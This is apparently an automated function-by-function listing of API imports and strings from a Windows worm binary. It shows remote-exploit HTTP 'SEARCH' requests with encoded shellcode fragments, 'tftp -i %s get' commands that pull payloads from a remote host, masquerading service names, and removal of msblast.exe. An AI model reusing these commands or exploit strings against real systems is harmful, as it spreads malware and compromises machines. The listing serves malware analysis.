sub_outside(): ADVAPI32.RegisterServiceCtrlHandlerA MSVCRT.__set_app_type MSVCRT.__p__fmode MSVCRT.__p__commode MSVCRT.__setusermatherr MSVCRT._initterm MSVCRT.__getmainargs MSVCRT.__p___initenv MSVCRT.exit MSVCRT._XcptFilter MSVCRT._exit |
sub_402880(0080): KERNEL32.Sleep |
sub_401280(013d): WS2_32.WSAStartup KERNEL32.GetLocalTime KERNEL32.ExitProcess KERNEL32.GetTickCount MSVCRT.srand KERNEL32.Sleep KERNEL32.CreateThread KERNEL32.CloseHandle WS2_32.inet_addr WS2_32.ntohl MSVCRT.rand "RpcPatch" "RpcTftpd" "RpcTftpd" "RpcTftpd" |
sub_4011C0(038f): KERNEL32.FreeConsole KERNEL32.GetSystemDirectoryA "C:\\WINDOWS\\system32" |
sub_402130(1046): WS2_32.ntohs WS2_32.inet_addr |
sub_402170(1372): "FXNBFXFXNBFXFXFXFX" "\\C$\\123456111111111111111.doc" |
sub_4027E0(213d): ADVAPI32.StartServiceCtrlDispatcherA "RpcPatch" |
sub_402C40(217e): KERNEL32.InterlockedIncrement WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.inet_ntoa MSVCRT.sprintf WS2_32.send WS2_32.setsockopt WS2_32.recv MSVCRT.strstr WS2_32.closesocket KERNEL32.Sleep KERNEL32.InterlockedDecrement "\r\nConnection: Keep-Alive\r\n\r\n" "GET / HTTP/1.1\r\nAccept: image/gif, imag"... "%s%s%s" "Server: Microsoft-IIS/5.0" "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n" "411" |
sub_401470(2225): KERNEL32.Sleep KERNEL32.CloseHandle WS2_32.ntohl KERNEL32.CreateThread |
sub_401990(2903): WS2_32.socket WS2_32.ntohl MSVCRT.rand WS2_32.ntohs WS2_32.bind WS2_32.WSACleanup KERNEL32.ExitProcess WS2_32.listen WS2_32.accept KERNEL32.Sleep KERNEL32.CreateThread KERNEL32.CloseHandle WS2_32.closesocket |
sub_4027B0(29ac): KERNEL32.CreateMutexA NTDLL.RtlGetLastWin32Error "RpcPatch_Mutex" |
sub_402F00(421f): ADVAPI32.OpenSCManagerA ADVAPI32.OpenServiceA ADVAPI32.CloseServiceHandle ADVAPI32.DeleteService |
sub_401210(4372): KERNEL32.Sleep MSVCRT.sprintf "tftp -i %s get dllhost.exe wins\\DLLHOST"... "tftp -i %s get svchost.exe wins\\SVCHOST"... |
sub_402820(4ac7): ADVAPI32.SetServiceStatus |
sub_401700(5f7d): KERNEL32.CreateProcessA |
sub_402F50(61ae): WS2_32.send KERNEL32.Sleep |
sub_401100(62e6): MSVCRT.rand |
sub_401B10(69e3): WS2_32.send WS2_32.recv MSVCRT.strstr |
sub_4180D7(6ee3): ADVAPI32.CloseServiceHandle |
sub_40A2D7(6ee3): ADVAPI32.CloseServiceHandle |
sub_401EA0(7035): WS2_32.gethostname WS2_32.gethostbyname WS2_32.inet_ntoa |
sub_4015E0(7913): MSVCRT.sprintf KERNEL32.CopyFileA "C:\\WINDOWS\\system32" "%s\\dllcache\\tftpd.exe" "C:\\WINDOWS\\system32" "%s\\wins\\svchost.exe" "MSDTC" "svchost.exe" "Network Connections Sharing" "RpcTftpd" |
sub_402310(7cc6): KERNEL32.GetVersion KERNEL32.GetVersionExA |
sub_402B20(9375): KERNEL32.InterlockedIncrement WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.send WS2_32.setsockopt WS2_32.recv WS2_32.closesocket KERNEL32.InterlockedDecrement |
sub_401F30(9732): "SEARCH /" "%u5951%u6858%u759f%u0018%u5951%u6858%u7"... "%u5390%u665e%u66ad%u993d%u7560%u56f8%u5"... "ffilomidomfafdfgfhinhnlaljbeaaaaaalimmm"... " HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Typ"... |
sub_4030E8(9c9a): MSVCRT._controlfp |
sub_401000(9f65): KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First MSVCRT.strrchr MSVCRT._stricmp KERNEL32.Process32Next KERNEL32.CloseHandle |
sub_401780(ad66): KERNEL32.GetOEMCP KERNEL32.GetSystemDefaultLCID MSVCRT.sprintf KERNEL32.WaitForSingleObject KERNEL32.TerminateProcess KERNEL32.CloseHandle KERNEL32.DeleteFileA KERNEL32.Sleep "%s -n -o -z -q" |
sub_402AB0(b82e): IPHLPAPI.IcmpCreateFile KERNEL32.GlobalAlloc IPHLPAPI.IcmpCloseHandle IPHLPAPI.IcmpSendEcho KERNEL32.GlobalFree |
sub_401660(b9f0): KERNEL32.GetModuleFileNameA MSVCRT.sprintf KERNEL32.CopyFileA "C:\\WINDOWS\\system32" "%s\\wins\\DLLHOST.EXE" "Browser" "DLLHOST.EXE" "WINS Client" "RpcPatch" |
sub_401B90(ba44): WS2_32.send WS2_32.setsockopt KERNEL32.GetTickCount WS2_32.recv MSVCRT.strstr "Transfer successful" "Timeout occurred" |
sub_402730(bb32): ADVAPI32.OpenSCManagerA ADVAPI32.OpenServiceA ADVAPI32.QueryServiceStatus ADVAPI32.CloseServiceHandle "RpcPatch" |
sub_402350(bd64): ADVAPI32.RegOpenKeyExA ADVAPI32.RegCloseKey |
sub_401C80(c36e): WS2_32.setsockopt WS2_32.recv MSVCRT.strstr KERNEL32.Sleep WS2_32.send WS2_32.closesocket "Microsoft Windows" "dir wins\\dllhost.exe\n\r" "DLLHOST.EXE" "dir dllcache\\tftpd.exe\n\r" "tftpd.exe" "TFTPD.EXE" "copy dllcache\\tftpd.exe wins\\svchost.ex"... "wins\\DLLHOST.EXE\n\r" "wins\\DLLHOST.EXE\n\r" |
sub_4022A0(c87b): KERNEL32.GetCurrentProcess ADVAPI32.OpenProcessToken ADVAPI32.LookupPrivilegeValueA ADVAPI32.AdjustTokenPrivileges USER32.ExitWindowsEx "SeShutdownPrivilege" |
sub_402540(c919): ADVAPI32.OpenSCManagerA MSVCRT.sprintf ADVAPI32.OpenServiceA KERNEL32.LocalAlloc ADVAPI32.QueryServiceStatus ADVAPI32.QueryServiceConfigA ADVAPI32.ChangeServiceConfigA ADVAPI32.StartServiceA KERNEL32.Sleep KERNEL32.GetTickCount KERNEL32.LocalFree ADVAPI32.CloseServiceHandle "C:\\WINDOWS\\system32" "-d%s\\wins" |
sub_402970(cc1b): KERNEL32.GetModuleFileNameA KERNEL32.GetFileAttributesA KERNEL32.SetFileAttributesA KERNEL32.GetModuleHandleA KERNEL32.CloseHandle |
sub_402390(d1ae): "SOFTWARE\\Microsoft\\Updates\\Windows 2000"... "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"... "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"... |
sub_402A00(e0f6): KERNEL32.OpenProcess KERNEL32.TerminateProcess KERNEL32.Sleep KERNEL32.CloseHandle MSVCRT.sprintf KERNEL32.GetFileAttributesA KERNEL32.SetFileAttributesA KERNEL32.DeleteFileA "msblast" "C:\\WINDOWS\\system32" "%s\\msblast.exe" |
sub_4023E0(e216): ADVAPI32.OpenSCManagerA MSVCRT.sprintf MSVCRT._stricmp ADVAPI32.CreateServiceA ADVAPI32.CloseServiceHandle ADVAPI32.OpenServiceA KERNEL32.LocalAlloc ADVAPI32.QueryServiceConfig2A ADVAPI32.ChangeServiceConfig2A KERNEL32.LocalFree "C:\\WINDOWS\\system32" "%s\\wins\\%s" "svchost.exe" "Manages network configuration by updati"... |
sub_401E80(e5ec): WS2_32.gethostbyname |
sub_4020E0(fdf6): WS2_32.ntohs WS2_32.inet_addr |